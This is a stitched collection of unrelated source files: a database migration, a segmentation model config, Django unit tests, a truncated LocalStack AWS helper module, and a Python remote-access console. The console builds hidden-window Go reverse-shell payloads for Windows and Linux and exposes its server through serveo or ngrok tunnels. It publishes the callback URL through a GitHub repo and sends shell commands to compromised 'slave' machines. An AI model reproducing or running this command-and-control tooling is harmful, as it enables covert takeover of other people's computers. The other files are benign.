"""CreateListTable Migration."""
from masoniteorm.migrations import Migration
class CreateListTable(Migration):
def up(self):
"""
Run the migrations.
"""
with self.schema.create("list") as table:
table.increments("id")
table.string("item")
table.string("amount")
table.timestamps()
def down(self):
"""
Revert the migrations.
"""
self.schema.drop("list")
|
the-stack_106_13051
|
"""
Dataset: ESC Corridor 1718 (VOC Type)
Method: FCN (hrnet)
Backbone: hr18s (we load the hr18 config and modify it; the trailing "s" stands for small)
Crop Size: 512x1024
Lr Schd: 80000
"""
_base_ = [
'../_base_/models/fcn_hr18.py', '../_base_/datasets/pascal_esccorridor_1718.py',
'../_base_/default_runtime.py', '../_base_/schedules/schedule_80k.py'
]
model = dict(
pretrained='open-mmlab://msra/hrnetv2_w18_small',
backbone=dict(
extra=dict(
stage1=dict(num_blocks=(2, )),
stage2=dict(num_blocks=(2, 2)),
stage3=dict(num_modules=3, num_blocks=(2, 2, 2)),
stage4=dict(num_modules=2, num_blocks=(2, 2, 2, 2)))),
decode_head=dict(num_classes=2))
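# Illustrative usage (not part of the original config): configs like this are
# normally passed to MMSegmentation's launcher scripts, e.g. (hypothetical path):
#   python tools/train.py configs/hrnet/fcn_hr18s_512x1024_80k_esccorridor_1718.py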
|
the-stack_106_13054
|
try:
import os
import sys
import threading
from time import sleep
from git import Repo
from termcolor import colored
import json
import subprocess
from datetime import date
import random
import string
from shutil import copy2
from pathlib import Path
from pyngrok import ngrok
except:
os.system("python3 -m pip install Gitpython")
os.system("python3 -m pip install termcolor")
os.system("python3 -m pip install pyngrok")
try:
from git import Repo
from termcolor import colored
from pyngrok import ngrok
except:
os.system("pip3 install Gitpython")
os.system("pip3 install termcolor")
os.system("pip3 install pyngrok")
from git import Repo
from termcolor import colored
from pyngrok import ngrok
print("Run me again! :)")
sys.exit()
repox = ""
urix = ""
comx = ""
ngrox = ""
def banner(lastupdate):
banner = f"""
(
\\
) ##########################################
##-------->>> #version >>> 0.1 (beta) #
) #last update >>> {lastupdate} #
/ #coded by script1337 #
( #github >>> https://github.com/script1337#
45hw477h4m4 >>> {{A King Above Ace}}
_.-"/______________________/////
`'-.\~~~~~~~~~~~~~~~~~~~~~~\\\\\\\\\\"""
return banner
if os.name == "nt":
homedir = str(Path.home())
else:
homedir = str(os.environ['HOME'])
def killx():
global urix, ngrox
printfc("stopping the server!", "red")
f = open("exit.asw", "w+")
f.close()
try:
ngrox.kill()
except:
pass
if os.name == "nt":
pass
else:
os.system("killall screen")
try:
os.remove("script1337.sh")
except:
pass
def linx():
if os.name == "nt":
linx = "\\"
else:
linx = "/"
return linx
def checks():
if os.path.exists(os.getcwd() + linx() + "data"):
pass
else:
os.makedirs("data")
def setup(repo, url):
if os.path.isdir(repo):
pass
else:
os.remove("config.json")
printfc("Repo not found!", "red")
killx()
sys.exit()
os.system("echo " + url + " > " + "." + linx() + repo + linx() + "urlx.txt")
repo = Repo('.' + linx() + repo) # if repo is CWD just do '.'
repo.index.add(['urlx.txt'])
repo.index.commit('45hw477h4m4:~# ')
origin = repo.remote('origin')
printfc("pushing new url ### ", "magenta")
try:
origin.push()
except:
printfc("Authentication failed!", "red")
# os.removedirs(str(repo))
# os.remove("config.json")
killx()
sys.exit()
def printfc(text, color):
if color == "red":
print(colored(text, 'red'))
if color == "green":
print(colored(text, 'green'))
if color == "yellow":
print(colored(text, 'yellow'))
if color == "cyan":
print(colored(text, 'cyan'))
if color == "magenta":
print(colored(text, 'magenta'))
def writex(username, contentx):
try:
with open(os.getcwd() + linx() + "data" + linx() + username + linx() + "recv.txt", "w+") as file:
file.write(contentx)
file.close()
except Exception as e:
if os.path.exists(os.getcwd() + linx() + "data" + linx() + username):
printfc("Something goes wrong ", "red")
printfc(e, "red")
else:
printfc("Slave " + username + " Not found!", "red")
def read():
while True:
try:
with open("response.txt", "r") as file:
data = file.read()
file.close()
response = data.replace("\n\n", "\n")
res = os.stat("response.txt")
if res.st_size == 0:
os.remove("response.txt")
elif data.replace(" ", "") == "":
continue
elif data.replace("\n", "") == "":
continue
else:
print("\n")
printfc(response, "cyan")
sleep(0.5)
os.remove("response.txt")
except:
pass
def checkbuildingconf():
global homedir
rev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "rev.go"
winrev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "winrev.go"
if "go version" in subprocess.check_output(["go", "version"]).decode():
checkgo = os.path.exists(str(homedir) + linx() + "go")
if checkgo:
checksrc = os.path.exists(str(homedir) + linx() + "go" + linx() + "src")
if checksrc:
revfile = os.path.isfile(rev)
winrevfile = os.path.isfile(winrev)
if revfile and winrevfile:
printfc("Everythink looking good", "green")
return True
else:
copy2("." + linx() + "source" + linx() + "rev.go",
homedir + linx() + "go" + linx() + "src" + linx() + "rev")
copy2("." + linx() + "source" + linx() + "winrev.go",
homedir + linx() + "go" + linx() + "src" + linx() + "rev")
return True
else:
os.makedirs(str(homedir) + linx() + "go" + linx() + "src")
return True
else:
printfc("Failed to build", "red")
printfc("Go path is not set!", "red")
return False
else:
printfc("please install go!", "red")
printfc("Go is not installed!", "red")
return False
def rawtogit(s):
str1 = ""
z = 1
for ele in s:
if z >= 4:
str1 += "/" + ele
else:
str1 += ele
z = z + 1
return str1
def animation():
global comx
printfc("Compiling:", "cyan")
animation = ["[■□□□□□□□□□]", "[■■□□□□□□□□]", "[■■■□□□□□□□]", "[■■■■□□□□□□]", "[■■■■■□□□□□]", "[■■■■■■□□□□]",
"[■■■■■■■□□□]", "[■■■■■■■■□□]", "[■■■■■■■■■□]", "[■■■■■■■■■■]"]
for i in range(len(animation)):
sleep(0.2)
sys.stdout.write(colored("\r" + animation[i % len(animation)], 'red'))
sys.stdout.flush()
if comx != "":
printfc("\n" + comx, "red")
sys.exit()
def callanimation():
the_process = threading.Thread(target=animation)
the_process.start()
return the_process
def writeonrev(option):
global repo, homedir, repox
line_to_replace = 44
if repox == "":
git = repo.replace("https://github.com", "https://raw.githubusercontent.com").split("/")
else:
git = repox.replace("https://github.com", "https://raw.githubusercontent.com").split("/")
git[1] = "//"
if rawtogit(git).endswith(".git"):
rawgit = "https://rawgitsuck.herokuapp.com/raw?git=" + rawtogit(git)[:-4] + "/master/urlx.txt"
else:
rawgit = "https://rawgitsuck.herokuapp.com/raw?git=" + rawtogit(git) + "/master/urlx.txt"
text = """\turlx, _ := reciver(string("{rawgit}"))""".format(rawgit=rawgit)
printfc("###UrL Resolver set to >>> " + str(rawgit), "green")
if option == 3 or option == 4:
rev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "rev.go"
else:
rev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "winrev.go"
with open(rev, 'r') as file:
lines = file.readlines()
if len(lines) > int(line_to_replace):
lines[line_to_replace] = text + '\n'
with open(rev, 'w') as file:
file.writelines(lines)
def builder():
global comx, homedir
rev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "rev.go"
winrev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "winrev.go"
if checkbuildingconf():
printfc("###Select os and arch >>> ", "green")
printfc("#1.Windows 64", "cyan")
printfc("#2.Windows 32", "cyan")
printfc("#3.linux 64", "cyan")
printfc("#4.linux 32", "cyan")
print(colored("#app::builder> ", 'yellow'), end="")
try:
options = int(input(""))
except:
pass
if os.name == "nt":
win = True
else:
win = False
try:
writeonrev(options)
if options == 1:
printfc("###Start compiling the payload >>> ", "yellow")
com = callanimation()
if win:
subprocess.call(
'powershell.exe $Env:GOOS = \\"windows\\"; $Env:GOARCH = \\"amd64\\"; go build -ldflags \\"-s -w\\" -ldflags -H=windowsgui -o revW64.exe "' + winrev,
shell=True)
else:
os.system(
"env GOOS=windows GOARCH=amd64 go build -ldflags \"-s -w\" -ldflags -H=windowsgui -o revW64.exe " + winrev)
comx = "Build successfull >>> {rev}".format(rev=os.getcwd() + linx() + "revW64.exe")
com.join()
elif options == 2:
printfc("###Start compiling the payload >>> ", "yellow")
com = callanimation()
if win:
subprocess.call(
'powershell.exe $Env:GOOS = \\"windows\\"; $Env:GOARCH = \\"386\\"; go build -ldflags \\"-s -w\\" -ldflags -H=windowsgui -o revW32.exe "' + winrev,
shell=True)
else:
os.system(
"env GOOS=windows GOARCH=386 go build -ldflags \"-s -w\" -ldflags -H=windowsgui -o revW32.exe " + winrev)
comx = "Build successfull >>> {rev}".format(rev=os.getcwd() + linx() + "revW32.exe")
com.join()
elif options == 3:
printfc("###Start compiling the payload >>> ", "yellow")
com = callanimation()
if win:
subprocess.call(
'powershell.exe $Env:GOOS = \\"linux\\"; $Env:GOARCH = \\"amd64\\"; go build -ldflags \\"-s -w\\" -o revL64 "' + rev,
shell=True)
else:
os.system("env GOOS=linux GOARCH=amd64 go build -ldflags \"-s -w\" -o revL64 " + rev)
comx = "Build successfull >>> {rev}".format(rev=os.getcwd() + linx() + "revL64")
com.join()
elif options == 4:
printfc("###Start compiling the payload >>> ", "yellow")
com = callanimation()
if win:
subprocess.call(
'powershell.exe $Env:GOOS = \\"linux\\"; $Env:GOARCH = \\"386\\"; go build -ldflags \\"-s -w\\" -o revL32 "' + rev,
shell=True)
else:
os.system("env GOOS=linux GOARCH=386 go build -ldflags \"-s -w\" -o revL32 " + rev)
comx = "Build successfull >>> {rev}".format(rev=os.getcwd() + linx() + "revL32")
com.join()
else:
printfc("Please select a valid option", "red")
except:
printfc("Please select a valid option", "red")
else:
pass
def helper():
help = """
{{
####Configration>>>
app::build {{ ###build payload >>> }}
app::config {{ ###Change github repo and reconfigure >>> }}
app::quit {{ ###quit >>> }}
app::slave {{ ###to see all slave computers >>> }}
####remote command>>>
username::command {{ ###run command on slave computer
example {{
script::ls -la
}}
}}
}}
"""
printfc(help, "red")
def sendcommand():
global urix
while True:
print(colored("45hw477h4m4:~# ", 'yellow'), end="")
xenz = input("")
try:
command = xenz.split("::")
except:
continue
if xenz == "":
continue
elif xenz.startswith("!"):
os.system(xenz.split("!")[1])
continue
if command[0] == "app":
try:
if command[1] == "slave":
try:
with open(os.getcwd() + linx() + "data" + linx() + "users.txt") as user:
printfc("Active slaves >>> ", "cyan")
printfc(user.read(), "cyan")
user.close()
except:
printfc("No slaves are found!", "red")
elif command[1] == "quit":
printfc("\ngoodbye", "red")
killx()
sys.exit()
elif command[1] == "build":
builder()
elif command[1] == "help":
helper()
elif command[1] == "config":
printfc("removing old config.json", "red")
try:
rev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "rev.go"
winrev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "winrev.go"
os.remove("config.json")
os.remove(rev)
os.remove(winrev)
except:
pass
if setconfig():
printfc("Config generated successfully!", "green")
with open("config.json", "r") as config:
confx = json.loads(config.read())
repox = confx["repo"]
config.close()
setup(repox.split("/")[4], urix)
except:
continue
else:
try:
writex(command[0], command[1])
except:
printfc("something goes Wrong", "red")
printfc("{ example >>> \n \tscript::ls -la \n \tapp::quit\n \t!ls -la\n}", "green")
def setconfig():
global repox
printfc("Running Setup ### ", "yellow")
datex = str(date.today())
printfc("Enter your repo url ###", "yellow")
repourl = input("# ")
try:
repo = repourl.split("/")
except:
printfc("#Enter a git repo url ###", "red")
killx()
sys.exit()
try:
if os.name == "nt":
subprocess.run('RD /S /Q ' + repo[4], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
os.system("rm -rf " + repo[4])
printfc("old repo get removed", "yellow")
except Exception as e:
print(e)
printfc("Trying to Cloning git repo ###", "magenta")
try:
Repo.clone_from(repourl, os.getcwd() + linx() + repo[4])
except Exception as ex:
e = str(ex)
if "does not exist" in e:
printfc("repository does not exist", "red")
killx()
sys.exit()
else:
printfc(e, "red")
config = """
{
"repo": \"""" + repourl + """\",
"lastupdate": \"""" + datex + """\"
}
"""
with open("config.json", "w+") as configx:
configx.write(str(config))
configx.close()
repox = repourl
return True
def randomString(stringLength=32):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
def createtunnel():
global urix
domain = str(randomString(32))
urix = "https://" + domain + ".serveousercontent.com"
if os.name == "nt":
os.system("start /min ssh -R " + domain + ":80:127.0.0.1:5000 serveo.net &")
else:
os.system("echo 'ssh -R " + domain + ":80:localhost:5000 serveo.net' > script1337.sh")
os.system("chmod +x script1337.sh")
os.system("screen -d -m bash script1337.sh")
def startserver():
try:
os.remove("exit.asw")
except:
pass
if os.name == "nt":
os.system("start /min python3 server.py &")
else:
os.system("nohup python3 server.py >/dev/null 2>&1 &")
if __name__ == '__main__':
if os.name == "nt":
os.system('color')
printfc("Starting the server!", "green")
printfc("Creating tunnel using ###", "green")
printfc("#1.serveo tunnel ###", "green")
printfc("#2.ngrok tunnel ###", "green")
print(colored("app::tunneling:~# ", 'yellow'), end="")
ngse = input("")
if ngse == str("1"):
createtunnel()
elif ngse == str("2"):
urix = ngrok.connect(port='5000', proto='http')
else:
printfc("###Please select a valid option ###", "red")
sys.exit()
startserver()
repo = ""
try:
try:
with open("config.json", "r") as config:
conf = json.loads(config.read())
# print(conf)
repo = conf["repo"]
lastupdate = conf["lastupdate"]
config.close()
printfc(banner(lastupdate), "cyan")
printfc("public_url >>> " + urix, "green")
except FileNotFoundError:
printfc(banner(str(date.today())), "cyan")
if setconfig():
printfc("Config generated successfully!", "green")
printfc("public_url >>> " + urix, "green")
checks()
try:
setup(repo.split("/")[4], urix)
except:
try:
setup(repox.split("/")[4], urix)
except Exception as e:
printfc("Run me again!", "yellow")
sys.exit()
tr = threading.Thread(target=read)
tr.daemon = True
tr.start()
printfc("###run app::help to see all options >>>", "magenta")
sendcommand()
except KeyboardInterrupt:
printfc("\ngoodbye", "red")
killx()
sys.exit()
|
the-stack_106_13055
|
# Copyright 2018 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from mock import patch
from fixture import DjangoFixture
from collections import OrderedDict
from fixture.style import NamedDataStyle
from fixture.django_testcase import FixtureTestCase
from dashboard.managers.packages import PackagesManager
from dashboard.tests.testdata.db_fixtures import (
LanguageData, LanguageSetData, PlatformData, ProductData, ReleaseData, PackageData
)
from dashboard.tests.testdata.mock_values import (
mock_requests_get_add_package, mock_requests_get_validate_package,
mock_requests_get_git_branches
)
db_fixture = DjangoFixture(style=NamedDataStyle())
class PackagesManagerTest(FixtureTestCase):
packages_manager = PackagesManager()
fixture = db_fixture
datasets = [LanguageData, LanguageSetData, ProductData, ReleaseData, PackageData]
def test_get_packages(self):
"""
Test get_packages
"""
packages = self.packages_manager.get_packages()
self.assertEqual(len(packages), 4)
package_names = [PackageData.package_anaconda.package_name,
PackageData.package_ibus.package_name]
packages = self.packages_manager.get_packages(pkgs=package_names).values()
self.assertEqual(len(packages), 2)
self.assertEqual(packages[0]['package_name'], PackageData.package_anaconda.package_name)
self.assertEqual(packages[1]['package_name'], PackageData.package_ibus.package_name)
# todo: test the filtering according to params
# params = ['package_name', 'upstream_url']
# packages = self.packages_manager.get_packages(pkgs=['ibus'], pkg_params=params)
# self.assertTrue(set(params).issubset(vars(packages.get()).keys()))
def test_is_package_exist(self):
"""
Test is_package_exist
"""
self.assertTrue(self.packages_manager.is_package_exist(PackageData.package_anaconda.package_name))
self.assertFalse(self.packages_manager.is_package_exist('otherpackage'))
@patch('requests.request', new=mock_requests_get_add_package)
def test_add_package(self):
"""
Test add_package
"""
transplatform = PlatformData.platform_zanata_fedora.platform_slug
kwargs = {'package_name': 'authconfig', 'upstream_url': 'https://github.com/jcam/authconfig',
'transplatform_slug': transplatform, 'release_streams': ['fedora']}
package_added = self.packages_manager.add_package(**kwargs)
self.assertTrue(package_added)
self.assertTrue(self.packages_manager.is_package_exist('authconfig'))
package_added = self.packages_manager.add_package(**kwargs)
self.assertFalse(package_added)
def test_count_packages(self):
"""
Test count_packages
"""
count = self.packages_manager.count_packages()
self.assertEqual(count, 4)
def test_get_package_name_tuple(self):
"""
Test get_package_name_tuple
"""
tuples = self.packages_manager.get_package_name_tuple()
self.assertEqual(len(tuples), 4)
self.assertEquals(tuples[0], ('anaconda', 'anaconda'))
@patch('requests.request', new=mock_requests_get_validate_package)
def xtest_validate_package(self):
"""
Test validate_package
"""
transplatform = PlatformData.platform_zanata_public.platform_slug
package_candlepin_name = PackageData.package_candlepin.package_name
package_validated = self.packages_manager.validate_package(package_name=package_candlepin_name,
transplatform_slug=transplatform)
self.assertEqual(package_validated, package_candlepin_name)
package_validated = self.packages_manager.validate_package(package_name='otherpackage',
transplatform_slug=transplatform)
self.assertFalse(package_validated)
def xtest_get_lang_id_name_dict(self):
"""
Test get_lang_id_name_dict
"""
lang_dict = self.packages_manager.get_lang_id_name_dict(
release_branch=ReleaseData.release_f27.release_slug
)
self.assertDictEqual(lang_dict, OrderedDict(
[(('fr_FR', 'fr'), 'French'), (('ja_JP', 'ja'), 'Japanese'), (('ru_RU', 'ru'), 'Russian')]))
def xtest_get_package_releases(self):
"""
Test get_package_releases
"""
package_releases = self.packages_manager.get_package_releases(
PackageData.package_anaconda.package_name
)
self.assertEqual(len(package_releases), 1)
self.assertEquals(package_releases[0].release_name, 'Fedora 27')
self.assertEquals(package_releases[0].product_slug.product_name, 'Fedora')
self.assertEquals(package_releases[0].language_set_slug.lang_set_name, 'F27 Set')
@patch('requests.request', new=mock_requests_get_git_branches)
def xtest_git_branches(self):
"""
Test git_branches
"""
scm_branch = self.packages_manager.git_branches(
package_name=PackageData.package_anaconda.package_name,
repo_type='l10n'
)
self.assertEqual(len(scm_branch), 2)
self.assertListEqual(scm_branch, ['autoupdate-potfiles', 'main'])
|
the-stack_106_13056
|
import json
import logging
import os
import re
import socket
import sys
import threading
import time
from typing import Dict, Optional, Union
from urllib.parse import urlparse
if sys.version_info >= (3, 8):
from typing import TypedDict
else:
from typing_extensions import TypedDict
import boto3
import botocore
import botocore.config
from botocore.utils import ArnParser, InvalidArnException
from localstack import config, constants
from localstack.constants import (
APPLICATION_AMZ_JSON_1_0,
APPLICATION_AMZ_JSON_1_1,
APPLICATION_X_WWW_FORM_URLENCODED,
ENV_DEV,
INTERNAL_AWS_ACCESS_KEY_ID,
LOCALHOST,
MAX_POOL_CONNECTIONS,
MOTO_ACCOUNT_ID,
REGION_LOCAL,
S3_VIRTUAL_HOSTNAME,
TEST_AWS_ACCESS_KEY_ID,
TEST_AWS_ACCOUNT_ID,
TEST_AWS_SECRET_ACCESS_KEY,
)
from localstack.utils.aws import templating
from localstack.utils.aws.aws_models import KinesisStream
from localstack.utils.common import (
get_service_protocol,
is_string,
is_string_or_bytes,
make_http_request,
retry,
run_safe,
to_str,
)
from localstack.utils.generic import dict_utils
# AWS environment variable names
ENV_ACCESS_KEY = "AWS_ACCESS_KEY_ID"
ENV_SECRET_KEY = "AWS_SECRET_ACCESS_KEY"
ENV_SESSION_TOKEN = "AWS_SESSION_TOKEN"
# set up logger
LOG = logging.getLogger(__name__)
# cache local region
LOCAL_REGION = None
# Use this flag to enable creation of a new session for each boto3 connection.
CREATE_NEW_SESSION_PER_BOTO3_CONNECTION = False
# Used in AWS assume role function
INITIAL_BOTO3_SESSION = None
# Boto clients cache
BOTO_CLIENTS_CACHE = {}
# Assume role loop seconds
DEFAULT_TIMER_LOOP_SECONDS = 60 * 50
# maps SQS queue ARNs to queue URLs
SQS_ARN_TO_URL_CACHE = {}
# List of parameters with additional event target parameters
EVENT_TARGET_PARAMETERS = ["$.SqsParameters", "$.KinesisParameters"]
# cached value used to determine the DNS status of the S3 hostname (whether it can be resolved properly)
CACHE_S3_HOSTNAME_DNS_STATUS = None
# mutex used when creating boto clients (which isn't thread safe: https://github.com/boto/boto3/issues/801)
BOTO_CLIENT_CREATE_LOCK = threading.RLock()
class Environment(object):
def __init__(self, region=None, prefix=None):
# target is the runtime environment to use, e.g.,
# 'local' for local mode
self.region = region or get_local_region()
# prefix can be 'prod', 'stg', 'uat-1', etc.
self.prefix = prefix
def apply_json(self, j):
if isinstance(j, str):
j = json.loads(j)
self.__dict__.update(j)
@staticmethod
def from_string(s):
parts = s.split(":")
if len(parts) == 1:
if s in PREDEFINED_ENVIRONMENTS:
return PREDEFINED_ENVIRONMENTS[s]
parts = [get_local_region(), s]
if len(parts) > 2:
raise Exception('Invalid environment string "%s"' % s)
region = parts[0]
prefix = parts[1]
return Environment(region=region, prefix=prefix)
@staticmethod
def from_json(j):
if not isinstance(j, dict):
j = j.to_dict()
result = Environment()
result.apply_json(j)
return result
def __str__(self):
return "%s:%s" % (self.region, self.prefix)
PREDEFINED_ENVIRONMENTS = {ENV_DEV: Environment(region=REGION_LOCAL, prefix=ENV_DEV)}
def get_environment(env=None, region_name=None):
"""
Return an Environment object based on the input arguments.
Parameter `env` can be any of:
* None (or empty), in which case the rules below are applied to (env = os.environ['ENV'] or ENV_DEV)
* an Environment object (then this object is returned)
* a string '<region>:<name>', which corresponds to Environment(region='<region>', prefix='<prefix>')
* the predefined string 'dev' (ENV_DEV), which implies Environment(region='local', prefix='dev')
* a string '<name>', which implies Environment(region=DEFAULT_REGION, prefix='<name>')
Additionally, parameter `region_name` can be used to override DEFAULT_REGION.
"""
if not env:
if "ENV" in os.environ:
env = os.environ["ENV"]
else:
env = ENV_DEV
elif not is_string(env) and not isinstance(env, Environment):
raise Exception("Invalid environment: %s" % env)
if is_string(env):
env = Environment.from_string(env)
if region_name:
env.region = region_name
if not env.region:
raise Exception('Invalid region in environment: "%s"' % env)
return env
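# Hedged usage sketch (added comment, not part of the original module): how the
# environment strings documented above resolve. The region/prefix literals are
# illustrative examples only.
#
#   get_environment(None)             -> Environment built from $ENV, or ENV_DEV
#   get_environment("dev")            -> PREDEFINED_ENVIRONMENTS[ENV_DEV], i.e.
#                                        Environment(region=REGION_LOCAL, prefix=ENV_DEV)
#   get_environment("us-east-1:stg")  -> Environment(region="us-east-1", prefix="stg")
#   get_environment("stg", region_name="eu-west-1")
#                                     -> Environment(region="eu-west-1", prefix="stg")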
def is_local_env(env):
return not env or env.region == REGION_LOCAL or env.prefix == ENV_DEV
class Boto3Session(boto3.session.Session):
"""Custom boto3 session that points to local endpoint URLs."""
def resource(self, service, *args, **kwargs):
self._fix_endpoint(kwargs)
return connect_to_resource(service, *args, **kwargs)
def client(self, service, *args, **kwargs):
self._fix_endpoint(kwargs)
return connect_to_service(service, *args, **kwargs)
def _fix_endpoint(self, kwargs):
if "amazonaws.com" in kwargs.get("endpoint_url", ""):
kwargs.pop("endpoint_url")
def get_boto3_session(cache=True):
if not cache or CREATE_NEW_SESSION_PER_BOTO3_CONNECTION:
return boto3.session.Session()
# return default session
return boto3
def get_region():
# Note: leave import here to avoid import errors (e.g., "flask") for CLI commands
from localstack.utils.aws.request_context import get_region_from_request_context
region = get_region_from_request_context()
if region:
return region
# fall back to returning static pre-defined region
return get_local_region()
def get_partition(region_name: str = None):
region_name = region_name or get_region()
return boto3.session.Session().get_partition_for_region(region_name)
def get_local_region():
global LOCAL_REGION
if LOCAL_REGION is None:
session = boto3.session.Session()
LOCAL_REGION = session.region_name or ""
return config.DEFAULT_REGION or LOCAL_REGION
def is_internal_call_context(headers):
"""Return whether we are executing in the context of an internal API call, i.e.,
the case where one API uses a boto3 client to call another API internally."""
auth_header = headers.get("Authorization") or ""
return get_internal_credential() in auth_header
def get_internal_credential():
return "Credential=%s/" % INTERNAL_AWS_ACCESS_KEY_ID
def set_internal_auth(headers):
authorization = headers.get("Authorization") or ""
if authorization.startswith("AWS "):
# Cover Non HMAC Authentication
authorization = re.sub(
r"AWS [^/]+",
"AWS %s" % get_internal_credential(),
authorization,
)
else:
authorization = re.sub(
r"Credential=[^/]+/",
get_internal_credential(),
authorization,
)
headers["Authorization"] = authorization
return headers
def get_local_service_url(service_name_or_port: Union[str, int]) -> str:
"""Return the local service URL for the given service name or port."""
if isinstance(service_name_or_port, int):
return f"{get_service_protocol()}://{LOCALHOST}:{service_name_or_port}"
service_name = service_name_or_port
if service_name == "s3api":
service_name = "s3"
elif service_name == "runtime.sagemaker":
service_name = "sagemaker-runtime"
return config.service_url(service_name)
def connect_to_resource(
service_name, env=None, region_name=None, endpoint_url=None, *args, **kwargs
):
"""
Generic method to obtain an AWS service resource using boto3, based on environment, region, or custom endpoint_url.
"""
return connect_to_service(
service_name,
client=False,
env=env,
region_name=region_name,
endpoint_url=endpoint_url,
)
def connect_to_service(
service_name,
client=True,
env=None,
region_name=None,
endpoint_url=None,
config: botocore.config.Config = None,
verify=False,
cache=True,
*args,
**kwargs,
):
"""
Generic method to obtain an AWS service client using boto3, based on environment, region, or custom endpoint_url.
"""
# determine context and create cache key
region_name = region_name or get_region()
env = get_environment(env, region_name=region_name)
region = env.region if env.region != REGION_LOCAL else region_name
key_elements = [service_name, client, env, region, endpoint_url, config, kwargs]
cache_key = "/".join([str(k) for k in key_elements])
# check cache first (most calls will be served from cache)
if cache and cache_key in BOTO_CLIENTS_CACHE:
return BOTO_CLIENTS_CACHE[cache_key]
with BOTO_CLIENT_CREATE_LOCK:
# check cache again within lock context to avoid race conditions
if cache and cache_key in BOTO_CLIENTS_CACHE:
return BOTO_CLIENTS_CACHE[cache_key]
# determine endpoint_url if it is not set explicitly
if not endpoint_url:
if is_local_env(env):
endpoint_url = get_local_service_url(service_name)
verify = False
backend_env_name = "%s_BACKEND" % service_name.upper()
backend_url = os.environ.get(backend_env_name, "").strip()
if backend_url:
endpoint_url = backend_url
# configure S3 path/host style addressing
if service_name == "s3":
if re.match(r"https?://localhost(:[0-9]+)?", endpoint_url):
endpoint_url = endpoint_url.replace("://localhost", "://%s" % get_s3_hostname())
# create boto client or resource from potentially cached session
boto_session = get_boto3_session(cache=cache)
boto_config = config or botocore.client.Config()
boto_factory = boto_session.client if client else boto_session.resource
# To prevent the error "Connection pool is full, discarding connection ...",
# set the environment variable MAX_POOL_CONNECTIONS. Default is 150.
boto_config.max_pool_connections = MAX_POOL_CONNECTIONS
new_client = boto_factory(
service_name,
region_name=region,
endpoint_url=endpoint_url,
verify=verify,
config=boto_config,
**kwargs,
)
if cache:
BOTO_CLIENTS_CACHE[cache_key] = new_client
return new_client
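# Hedged usage sketch (added for illustration; the service names and boto3 calls
# shown are standard AWS examples, not definitions from this module):
# connect_to_service() returns a cached boto3 client wired to the local endpoint,
# while connect_to_resource() returns the boto3 resource variant.
#
#   sqs = connect_to_service("sqs")                       # client, default region
#   s3 = connect_to_service("s3", region_name="us-east-1")
#   s3.list_buckets()                                      # ordinary boto3 call
#   ddb = connect_to_resource("dynamodb")                  # boto3 resource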
def create_external_boto_client(
service_name,
client=True,
env=None,
region_name=None,
endpoint_url=None,
config: botocore.config.Config = None,
verify=False,
cache=True,
*args,
**kwargs,
):
return connect_to_service(
service_name,
client,
env,
region_name,
endpoint_url,
config,
verify,
cache,
aws_access_key_id="__test_call__",
aws_secret_access_key="__test_key__",
*args,
**kwargs,
)
def get_s3_hostname():
global CACHE_S3_HOSTNAME_DNS_STATUS
if CACHE_S3_HOSTNAME_DNS_STATUS is None:
try:
assert socket.gethostbyname(S3_VIRTUAL_HOSTNAME)
CACHE_S3_HOSTNAME_DNS_STATUS = True
except socket.error:
CACHE_S3_HOSTNAME_DNS_STATUS = False
if CACHE_S3_HOSTNAME_DNS_STATUS:
return S3_VIRTUAL_HOSTNAME
return LOCALHOST
# TODO remove from here in the future
def render_velocity_template(*args, **kwargs):
return templating.render_velocity_template(*args, **kwargs)
def generate_presigned_url(*args, **kwargs):
endpoint_url = kwargs.pop("endpoint_url", None)
s3_client = connect_to_service(
"s3",
endpoint_url=endpoint_url,
cache=False,
# Note: presigned URL needs to be created with (external) test credentials
aws_access_key_id=TEST_AWS_ACCESS_KEY_ID,
aws_secret_access_key=TEST_AWS_SECRET_ACCESS_KEY,
)
return s3_client.generate_presigned_url(*args, **kwargs)
def check_valid_region(headers):
"""Check whether a valid region is provided, and if not then raise an Exception."""
auth_header = headers.get("Authorization")
if not auth_header:
raise Exception('Unable to find "Authorization" header in request')
replaced = re.sub(r".*Credential=([^,]+),.*", r"\1", auth_header)
if auth_header == replaced:
raise Exception('Unable to find "Credential" section in "Authorization" header')
# Format is: <your-access-key-id>/<date>/<aws-region>/<aws-service>/aws4_request
# See https://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-auth-using-authorization-header.html
parts = replaced.split("/")
region = parts[2]
if region not in config.VALID_REGIONS:
raise Exception('Invalid region specified in "Authorization" header: "%s"' % region)
def set_default_region_in_headers(headers, service=None, region=None):
# this should now be a no-op, as we support arbitrary regions and don't use a "default" region
# TODO: remove this function once the legacy USE_SINGLE_REGION config is removed
if not config.USE_SINGLE_REGION:
return
auth_header = headers.get("Authorization")
region = region or get_region()
if not auth_header:
if service:
headers["Authorization"] = mock_aws_request_headers(service, region_name=region)[
"Authorization"
]
return
replaced = re.sub(r"(.*Credential=[^/]+/[^/]+/)([^/])+/", r"\1%s/" % region, auth_header)
headers["Authorization"] = replaced
def fix_account_id_in_arns(response, colon_delimiter=":", existing=None, replace=None):
"""Fix the account ID in the ARNs returned in the given Flask response or string"""
existing = existing or ["123456789", "1234567890", "123456789012", MOTO_ACCOUNT_ID]
existing = existing if isinstance(existing, list) else [existing]
replace = replace or TEST_AWS_ACCOUNT_ID
is_str_obj = is_string_or_bytes(response)
content = to_str(response if is_str_obj else response._content)
replace = r"arn{col}aws{col}\1{col}\2{col}{acc}{col}".format(col=colon_delimiter, acc=replace)
for acc_id in existing:
